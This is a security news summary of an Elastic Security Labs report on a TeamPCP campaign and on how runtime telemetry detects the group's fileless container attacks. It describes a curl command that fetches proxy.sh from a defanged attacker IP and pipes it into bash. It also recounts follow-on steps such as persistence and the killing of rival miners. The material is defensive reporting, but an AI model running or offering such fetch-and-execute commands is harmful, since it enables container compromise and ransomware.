Container ransomware via one curl
Elastic Security Labs detailed a TeamPCP campaign that starts with a single curl command and achieves full code execution inside containers without writing files to disk. The report included runtime detection signals from Defend for Containers (D4C) across the attack chain, showing how runtime telemetry can reveal ephemeral, fileless container attacks. The demonstration highlights risks for Kubernetes workloads and the value of runtime signals integrated into classified environments. (x.com/elasticseclabs)
A container can be turned against its owner with one command: download a script with `curl`, pipe it into `bash`, and run code without saving a file first. (elastic.co) Elastic Security Labs published that walkthrough on March 20, 2026, using a TeamPCP intrusion chain that starts with `curl -fsSL` fetching `proxy.sh` from `67.217.57[.]240:666` and executing it inside a container. (elastic.co) The point of that trick is simple: if nothing lands on disk, file scanners have less to inspect. Elastic said its Defend for Containers tool still sees the runtime pattern because `curl` immediately spawns a shell inside the container. (elastic.co) Containers are the packaged units that run many modern apps, and Kubernetes is the control system that schedules those packages across clusters of machines. Elastic’s example shows attackers using the first foothold to check whether the workload is running in Kubernetes and then move toward persistence, lateral spread, and monetization. (elastic.co) Elastic’s March 19, 2026 documentation says Defend for Containers is deployed to Kubernetes clusters through Elastic Agent as a DaemonSet and uses extended Berkeley Packet Filter, or eBPF, Linux Security Module and tracepoint probes to record process, file, and network events. (elastic.co) That matters for attacks built to be brief and disposable. Elastic said the TeamPCP scenario leaves observable runtime behavior across execution, discovery, persistence, command-and-control, and impact even when the initial payload is fileless. (elastic.co) The TeamPCP activity in Elastic’s write-up builds on Flare’s February 5, 2026 research, which said the group launched a broad campaign in December 2025 against exposed Docker application programming interfaces, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell-vulnerable apps. (flare.io) Flare said TeamPCP used those compromises to assemble proxy and scanning infrastructure, steal data, deploy ransomware, extort victims, and mine cryptocurrency. The firm said 97% of the compromised servers it tracked were in Microsoft Azure and Amazon Web Services, with 61% in Azure and 36% in Amazon Web Services. (flare.io) Elastic’s container scenario also shows the group killing rival mining processes such as XMRig after gaining execution. That kind of process killing is unusual in normal container workloads and becomes another runtime signal defenders can alert on. (elastic.co) The attack still starts with one short `curl` line, but the defenders’ view is no longer just the file that never appeared. It is the chain of processes, parents, and follow-on actions the command leaves behind in the running container. (elastic.co)
